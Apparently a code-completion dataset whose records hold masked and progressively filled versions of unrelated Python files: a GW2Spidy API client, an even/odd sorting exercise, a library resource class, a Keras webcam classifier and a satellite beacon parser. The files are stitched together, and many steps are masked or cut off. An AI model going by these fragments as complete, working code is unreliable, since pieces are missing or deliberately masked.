{ "blob_id": "109a0ba0952bd5923ecbefa41556de7aa9f9eea8", "index": 4197, "step-1": "# Copyright (c) 2012 - Samuel Loretan <tynril at gmail.com>\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport urllib2\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nclass Gw2Spidy:\n \"\"\"This utility class allows easy access to the GW2Spidy data.\"\"\"\n headers = {'User-Agent': 'gw2spidy.py'}\n\n @staticmethod\n def getTypesList():\n \"\"\"Get a list of item types and subtypes.\"\"\"\n return Gw2Spidy._request('types')['results']\n\n @staticmethod\n def getDisciplinesList():\n \"\"\"Get a list of crafting disciplines.\"\"\"\n return Gw2Spidy._request('disciplines')['results']\n\n @staticmethod\n def getRaritiesList():\n \"\"\"Get a list of item rarities.\"\"\"\n return Gw2Spidy._request('rarities')['results']\n\n @staticmethod\n def getAllItemsList():\n \"\"\"Get a list of all items.\"\"\"\n return Gw2Spidy._request('all-items', 
'all')['results']\n\n @staticmethod\n def getItemsOfType(typeId):\n \"\"\"Get a list of all items of a certain type.\"\"\"\n return Gw2Spidy._request('all-items', str(typeId))['results']\n\n @staticmethod\n def getItemData(itemId):\n \"\"\"Get the data of a particular item. High frequency of update.\"\"\"\n return Gw2Spidy._request('item', str(itemId))['result']\n\n @staticmethod\n def getItemBuyListings(itemId, allPages = False):\n \"\"\"Get a list of all buy offers for a certain item.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'buy')\n\n @staticmethod\n def getItemSellListings(itemId, allPages = False):\n \"\"\"Get a list of all sell offers for a certain item.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'listings', str(itemId), 'sell')\n\n @staticmethod\n def searchItems(name, allPages = False):\n \"\"\"Search items by name. Might be slow, not recommended.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'item-search', name)\n\n @staticmethod\n def getAllRecipesList(allPages = False):\n \"\"\"Get a list of all crafting recipes.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'recipes', 'all')\n\n @staticmethod\n def getRecipesOfDiscipline(disciplineId, allPages = False):\n \"\"\"Get a list of all crafting recipes for a certain discipline.\"\"\"\n return Gw2Spidy._paginatedRequest(allPages, 'recipes', str(disciplineId))\n\n @staticmethod\n def getRecipeData(recipeId):\n \"\"\"Get the data of a particular recipe.\"\"\"\n return Gw2Spidy._request('recipe', str(recipeId))\n\n @staticmethod\n def getGemPrice():\n \"\"\"Get the current gem/gold conversion rate.\"\"\"\n return Gw2Spidy._request('gem-price')\n\n @staticmethod\n def _paginatedRequest(allPages, *args):\n \"\"\"Handle paginated requests, downloading all pages if requested.\"\"\"\n data = []\n currentPage = 0\n while True:\n newData = Gw2Spidy._request(*(args + (str(currentPage),)))\n if not allPages:\n return newData['results']\n 
data.extend(newData['results'])\n currentPage = currentPage + 1\n if newData['page'] == newData['last_page']:\n break\n return data\n\n @staticmethod\n def _request(*args):\n \"\"\"Makes a request on the GW2Spidy API.\"\"\"\n url = 'http://www.gw2spidy.com/api/v0.9/json/' + '/'.join(args)\n\tr = urllib2.Request(url, headers=Gw2Spidy.headers)\n\tif 'Cookie' not in Gw2Spidy.headers:\n\t resp = urllib2.urlopen(r)\n\t if 'set-cookie' in resp.headers:\n\t\tGw2Spidy.headers['Cookie'] = resp.headers['set-cookie'].split(';', 1)[0]\n\t return json.loads(resp.read())\n return json.loads(urllib2.urlopen(r).read())\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for c in range(0, 7): num = int(input(f'Digite o {c + 1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}') <|reserved_special_token_1|> <|reserved_special_token_0|> n = [[], []] for c in range(0, 7): num = int(input(f'Digite o {c + 1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}') <|reserved_special_token_1|> """ Crie um programa onde o usuario possa digitar sete valores numericos e cadastre-os em uma lisa unicaque mantenha separados os valores pares e impares. No final, mostre os valores ares e impares em ordem crescente """ n = [[],[]] for c in range(0,7): num = int(input(f'Digite o {c+1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}')
flexible
{ "blob_id": "72bbbe78db746febc9a36a676e0fa2d97bf5e81e", "index": 8849, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor c in range(0, 7):\n num = int(input(f'Digite o {c + 1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')\n", "step-3": "<mask token>\nn = [[], []]\nfor c in range(0, 7):\n num = int(input(f'Digite o {c + 1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')\n", "step-4": "\"\"\" Crie um programa onde o usuario possa digitar sete valores numericos e cadastre-os em uma lisa unicaque mantenha\nseparados os valores pares e impares. No final, mostre os valores ares e impares em ordem crescente \"\"\"\n\nn = [[],[]]\n\nfor c in range(0,7):\n num = int(input(f'Digite o {c+1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year <|reserved_special_token_0|> <|reserved_special_token_0|> def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a 
resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> def get_resource_details(self): """Method that returns the main details of a resource object""" return ( f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]' ) <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher def get_year(self): """Method that gets the year of a resource object""" return self.year def get_resource_details(self): """Method that returns the main details of a resource object""" return ( f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]' ) <|reserved_special_token_1|> # -*- coding: 
utf-8 -*- """ Created on Tue Oct 9 16:22:21 2018 @author: SDis """ #import Code.Members_module class Resources: """ Parent class for Books and eResources containg the main data fields and related setters and getters""" def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year #Setters def set_title (self, title): """Method that sets the title of a resource object""" self.title = title def set_author (self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher (self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year (self, year): """Method that sets the year of a resource object""" self.year = year #Getters def get_title(self): """Method that gets the title of a resource object""" return self.title def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher def get_year(self): """Method that gets the year of a resource object""" return self.year def get_resource_details (self): """Method that returns the main details of a resource object""" return (f"[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]")
flexible
{ "blob_id": "0709d413ddbe41a0c97f94b7819fdfded241d3fc", "index": 691, "step-1": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n <mask token>\n <mask token>\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n <mask token>\n <mask token>\n <mask token>\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the 
author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n\n def get_resource_details(self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (\n f'[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'\n )\n", "step-4": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n\n def get_year(self):\n \"\"\"Method that gets the year of a resource object\"\"\"\n return self.year\n\n def get_resource_details(self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (\n 
f'[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'\n )\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 9 16:22:21 2018\n\n@author: SDis\n\"\"\"\n#import Code.Members_module\n\nclass Resources:\n \"\"\" Parent class for Books and eResources containg the main data fields and related setters and getters\"\"\"\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year \n#Setters \n def set_title (self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title \n def set_author (self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n def set_publisher (self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n def set_year (self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n#Getters \n def get_title(self):\n \"\"\"Method that gets the title of a resource object\"\"\"\n return self.title\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n def get_year(self):\n \"\"\"Method that gets the year of a resource object\"\"\"\n return self.year\n\n def get_resource_details (self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (f\"[Title:\\\"{self.get_title()}\\\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]\")\n \n\n \n\n\n\n\n", "step-ids": [ 4, 8, 9, 10, 13 ] }
[ 4, 8, 9, 10, 13 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> if classifier is not None: print('model is loaded from ', model_file) <|reserved_special_token_0|> while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> <|reserved_special_token_0|> model_file = 'MODELS/5-2-19_v2.h5' classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) cap = cv2.VideoCapture(0) while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> import cv2 from keras.preprocessing import image import keras import 
numpy as np model_file = 'MODELS/5-2-19_v2.h5' classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) cap = cv2.VideoCapture(0) while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> # ============================================================================= # ######################## Creator: Rhys Aeron Williams ####################### # ######################## Last update: 14th March 2019 ####################### # ============================================================================= # ============================================================================= # ####################### IMPORT THE LIBRARIES NECESSARY ###################### # ============================================================================= import cv2 from keras.preprocessing import image import keras import numpy as np # ============================================================================= # ####################### LOAD THE MODEL TO RUN ############################### # ============================================================================= model_file = "MODELS/5-2-19_v2.h5" classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) # 
============================================================================= # ######################## USE THE WEBCAM ON THE LAPTOP ####################### # ============================================================================= cap = cv2.VideoCapture(0) while(1): # ============================================================================= # ######################## GET THE FRAME FROM WEBCAM ########################## # ============================================================================= hasFrame, frame = cap.read() if not hasFrame: break # ============================================================================= # ######################## RESIZE THE FRAME AND SAVE ########################## # ============================================================================= h,w,bpp = np.shape(frame) dim = (int(w/4), int(h/4)) frame_2 = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA) cv2.imwrite("frame.jpg", frame_2) # ============================================================================= # ################## READ THE FRAME AND PUT INTO CLASSIFIER ################### # ============================================================================= test_frame = image.load_img('frame.jpg', target_size = (60,40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis = 0) result = classifier.predict(test_frame) # ============================================================================= # ####################### GET PREDICITION OF THE FRAME ######################## # ============================================================================= if result[0][0] == 1: prediction = 'good' text_colour = (0,255,0) else: prediction = 'bad' text_colour = (0,0,255) cv2.putText(frame, prediction, (5,80),cv2.FONT_HERSHEY_SIMPLEX, fontScale = 3, color = text_colour,thickness = 3) # ============================================================================= # ############################# SHOW FRAMES (VIDEO) 
########################### # ============================================================================= cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows()
flexible
{ "blob_id": "e89ca4907373318bd55d0833730a30d981414992", "index": 2677, "step-1": "<mask token>\n", "step-2": "<mask token>\nif classifier is not None:\n print('model is loaded from ', model_file)\n<mask token>\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-3": "<mask token>\nmodel_file = 'MODELS/5-2-19_v2.h5'\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\ncap = cv2.VideoCapture(0)\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n 
break\ncap.release()\ncv2.destroyAllWindows()\n", "step-4": "import cv2\nfrom keras.preprocessing import image\nimport keras\nimport numpy as np\nmodel_file = 'MODELS/5-2-19_v2.h5'\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\ncap = cv2.VideoCapture(0)\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-5": "# =============================================================================\n# ######################## Creator: Rhys Aeron Williams #######################\n# ######################## Last update: 14th March 2019 #######################\n# =============================================================================\n\n# =============================================================================\n# ####################### IMPORT THE LIBRARIES NECESSARY ######################\n# =============================================================================\n\nimport cv2\nfrom keras.preprocessing import image\nimport keras\nimport numpy as np\n\n\n# =============================================================================\n# ####################### LOAD THE MODEL TO RUN ###############################\n# 
=============================================================================\n\nmodel_file = \"MODELS/5-2-19_v2.h5\"\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\n \n\n# =============================================================================\n# ######################## USE THE WEBCAM ON THE LAPTOP #######################\n# =============================================================================\n \ncap = cv2.VideoCapture(0)\n\nwhile(1):\n\n# =============================================================================\n# ######################## GET THE FRAME FROM WEBCAM ##########################\n# =============================================================================\n\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n \n\n# =============================================================================\n# ######################## RESIZE THE FRAME AND SAVE ##########################\n# =============================================================================\n \n h,w,bpp = np.shape(frame)\n dim = (int(w/4), int(h/4))\n frame_2 = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n cv2.imwrite(\"frame.jpg\", frame_2)\n \n\n# =============================================================================\n# ################## READ THE FRAME AND PUT INTO CLASSIFIER ###################\n# =============================================================================\n \n test_frame = image.load_img('frame.jpg', target_size = (60,40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis = 0)\n result = classifier.predict(test_frame)\n \n\n# =============================================================================\n# ####################### GET PREDICITION OF THE FRAME ########################\n# =============================================================================\n \n if result[0][0] == 1:\n prediction = 
'good'\n text_colour = (0,255,0)\n else:\n prediction = 'bad'\n text_colour = (0,0,255)\n\n\n cv2.putText(frame, prediction, (5,80),cv2.FONT_HERSHEY_SIMPLEX, \n fontScale = 3, color = text_colour,thickness = 3)\n \n \n# =============================================================================\n# ############################# SHOW FRAMES (VIDEO) ###########################\n# =============================================================================\n \n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) <|reserved_special_token_0|> class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> <|reserved_special_token_0|> class ADCS1(object): <|reserved_special_token_0|> <|reserved_special_token_0|> class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str 
class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> <|reserved_special_token_0|> BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) (self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status, self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp, self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ( """EPS: Boot count: {0} Up time: {1} seconds Real time clock: {2} Battery voltage: {3} mV Cell difference: {4:.1f} mV Battery current: {5} mA Solar power: {6} Temperature: {7} C PA temperature: {8} C""" .format(self.boot_count, self.uptime, datetime.fromtimestamp( self.rt_clock), self.battery_voltage, self.cell_diff, self. 
